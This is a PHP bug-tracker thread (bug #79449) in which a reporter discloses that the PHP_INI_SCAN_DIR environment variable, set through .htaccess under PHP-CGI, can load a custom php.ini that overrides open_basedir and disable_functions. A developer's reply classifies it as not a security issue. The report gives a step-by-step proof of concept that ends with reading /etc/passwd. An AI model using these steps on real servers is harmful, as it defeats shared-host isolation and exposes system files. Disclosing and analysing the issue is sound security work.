Bug #79449 [Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...)
| From: | havijoori at protonmail dot com | Date: | Sat, 04 Apr 2020 18:57:07 +0000 |
| Subject: | Bug #79449 [Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...) | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-226433@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=79449&edit=1
ID: 79449
User updated by: havijoori at protonmail dot com
Reported by: havijoori at protonmail dot com
Summary: PHP CGI Security Restrictions Bypass (open_basedir,
disable_functions, ...)
Status: Not a bug
Type: Bug
Package: *General Issues
Operating System: Linux
PHP Version: 7.4.4
Block user comment: N
Private report: N
New Comment:
If you don't care about this issue, so I am going to publish it.
Previous Comments:
------------------------------------------------------------------------
[2020-04-03 21:20:58] havijoori at protonmail dot com
Yes, but some environment variables can be critical and should be protected.
Same as the work you are doing in PHP-FPM.
This can help servers like shared hosts which are serving PHP with mod_cgi.
------------------------------------------------------------------------
[2020-04-03 20:46:35] stas@php.net
This is not a security issue, if you give your users control over the environment, they can
influence the environment.
------------------------------------------------------------------------
[2020-04-03 20:42:19] havijoori at protonmail dot com
Description:
------------
Description :
=============
One of PHP features is running PHP scripts as CGI scripts with PHP-CGI. For example in Apache http
server, we can refer php scripts to PHP-CGI with mod_cgi. In this state, PHP looks for
PHP_INI_SCAN_DIR environment variable to find directory containing .ini files. So if we set this
environment variable befoe calling php scripts, we can rewrite default php.ini configs such as
open_basedir, disable_functions and other security configs.
PoC :
=====
First we configure a web server which handles PHP as CGI with mod_cgi.
Apache config file is something like this :
--------------------
LoadModule cgi_module modules/mod_cgi.so
DocumentRoot "/srv/http"
<Directory "/srv/http">
AllowOverride All
Require all granted
</Directory>
Action php-script /cgi-bin/php
AddHandler php-script .php
...
--------------------
And we set some security restrictions in PHP config file :
--------------------
[PHP]
open_basedir = /srv/http:/tmp
disable_functions = phpinfo
...
--------------------
Now, we test our security config with a simple test.php file :
--------------------
<?php
echo file_get_contents('/etc/passwd');
?>
--------------------
<b>Warning</b>: file_get_contents(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/srv/http:/tmp) in
<b>/srv/http/test.php</b> on line <b>2</b><br />
And :
--------------------
<?php
echo phpinfo();
?>
--------------------
<b>Warning</b>: phpinfo() has been disabled for security reasons in
<b>/srv/http/test.php</b> on line <b>2</b><br />
OK, now we make a .htaccess file in /srv/http and set PHP_INI_SCAN_DIR environment variable :
--------------------
SetEnv PHP_INI_SCAN_DIR /srv/http
--------------------
And a php.ini file in /srv/http :
--------------------
[PHP]
open_basedir = /
disable_functions =
--------------------
Here, both security restrictions are bypassed and we can read /etc/passwd file and run phpinfo
function.
Tested with PHP 7.4.4 and Apache 2.4.41.
Prevention :
============
To prevent this vulnerability, you can put a config like "clear_env" in PHP-FPM for
PHP-CGI or remove PHP_INI_SCAN_DIR from environment variables in CGI mode.
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=79449&edit=1